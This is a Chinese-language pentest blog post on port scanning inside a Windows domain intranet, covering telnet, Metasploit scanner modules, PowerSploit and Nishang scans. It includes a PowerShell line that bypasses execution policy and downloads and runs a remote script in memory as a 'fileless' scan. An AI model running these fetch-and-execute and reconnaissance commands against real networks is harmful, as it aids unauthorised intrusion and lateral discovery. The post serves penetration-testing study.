內網滲透測試之域內端口掃描 port scanning of intranet pentest in domain https://www.cnblogs.com/iAmSoScArEd/p/13869632.html 來自我超怕的
通過端口掃描主要用於得到端口的banner信息、端口上運行的服務、發現常見應用的默認端口。
1、利用telnet進行端口掃描
快速探測主機是否存在常見的高危端口
telnet 192.168.0.2 22 telnet 192.168.0.2 3306
2、Metasploit端口掃描
Metasploit滲透測試利器,提供了很多漏洞利用、掃描功能。
auxiliary/scanner/portscan/ack ACK防火牆掃描
auxiliary/scanner/portscan/ftpbounce FTP跳端口掃描
auxiliary/scanner/portscan/syn SYN端口掃描
auxiliary/scanner/portscan/tcp TCP端口掃描
auxiliary/scanner/portscan/xmas TCP"XMas"端口掃描
使用auxiliary/scanner/portscan/tcp模塊示例
use auxiliary/scanner/portscan/tcp show options set ports 1-1024 set RHOSTS 192.168.0.1 set THREADS 10 run
3、PowerSploit的Invoke-portscan.ps1
無文件形式掃描:
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,80,8080,3389' -oA c:\ProgramData\ip_info"
4、Nishang的Invoke-PortScan模塊
獲取幫助
Get-Help Invoke-PortScan -full
詳細代碼:https://github.com/samratashok/nishang/blob/master/Scan/Invoke-PortScan.ps1
StartAddress 掃描范圍開始地址
EndAddress 掃描范圍結束地址
ScanPort 進行端口掃描
Port 指定掃描端口,不指定port,則默認端口為 21,22,23,53,69,71,80,98,110,139,111, 389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389, 5801,5900,5555,5901
TimeOut 設置超時時間
-ResolveHost 解析主機名
掃描存活主機及端口並解析主機名
使用方式
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort
5、Nmap
https://www.cnblogs.com/iAmSoScArEd/p/10585863.html
6、端口利用
具體信息及利用速查 :https://www.cnblogs.com/iAmSoScArEd/p/10564262.html
根據banner信息,可以在CVE庫對指定服務、版本進行漏洞查詢
或使用Exploit-DB查詢PoC、EXP